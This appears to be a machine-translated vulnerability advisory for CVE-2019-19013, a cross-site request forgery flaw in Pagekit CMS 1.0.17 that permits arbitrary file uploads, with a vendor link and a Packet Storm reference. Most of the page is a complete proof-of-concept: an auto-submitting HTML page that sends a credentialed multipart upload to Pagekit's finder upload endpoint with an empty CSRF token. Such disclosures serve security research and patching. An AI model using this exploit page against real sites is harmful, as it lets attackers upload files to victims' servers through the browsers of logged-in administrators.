Pagekit CSRF Vulnerability (CVE-2019-19013)

Pagekit CSRF Vulnerability (CVE-2019-19013)

Release Date: 2019-11-21
Updated: 2019-11-26

Affected Systems:

Pagekit Pagekit 1.0.17

description:

---

CVE (the CAN) ID: CVE-2019-19013

Pagekit is a modular, lightweight content management systems.

Pagekit 1.0.17 version, there is a CSRF vulnerability in implementations. By removing the tag from CSRF request, an attacker can exploit this vulnerability to upload arbitrary files.

<* Source: Vendor
  *>

Test method:

---

WARNING

The following procedures (methods) may carry offensive, only for safety research and teaching purposes. Users own risk!

vendor （）提供了如下测试方法：

<html>

  <body>

  <script>history.pushState('', '', '/')</script>

    <script>

      function submitRequest()

      {

        var xhr = new XMLHttpRequest();

        xhr.open("POST", "http:\/\/localhost\/pagekit\/system\/finder\/upload", true);

        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryJze564AoGkbRRRUz");

        xhr.setRequestHeader("Accept", "*\/*");

        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");

        xhr.withCredentials = true;

        var body = "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +

          "Content-Disposition: form-data; name=\"files[]\"; filename=\"test.jpg\"\r\n" +

          "Content-Type: image/jpeg\r\n" +

          "\r\n" +

          "\r\n" +

          "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +

          "Content-Disposition: form-data; name=\"path\"\r\n" +

          "\r\n" +

          "/\r\n" +

          "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +

          "Content-Disposition: form-data; name=\"root\"\r\n" +

          "\r\n" +

          "storage\r\n" +

          "------WebKitFormBoundaryJze564AoGkbRRRUz\r\n" +

          "Content-Disposition: form-data; name=\"_csrf\"\r\n" +

          "\r\n" +

          "\r\n" +

          "------WebKitFormBoundaryJze564AoGkbRRRUz--\r\n";

        var aBody = new Uint8Array(body.length);

        for (var i = 0; i < aBody.length; i++)

          aBody[i] = body.charCodeAt(i);

        xhr.send(new Blob([aBody]));

      }

      submitRequest();

    </script>

    <form action="#">

      <input type="button" value="Submit request" onclick="submitRequest();" />

    </form>

  </body>

< /html>

建议：

---

Manufacturers patch:

Pagekit
-------
currently no vendors provide patches or upgrades, we recommend that you use this software at any time concerned about the vendor's home page to get the latest version:

https://pagekit.com/

HTTPS: // packetstormsecurity.com/files/155426/Pagekit-CMS-1.0.17-Cross-Site-Request-Forgery.html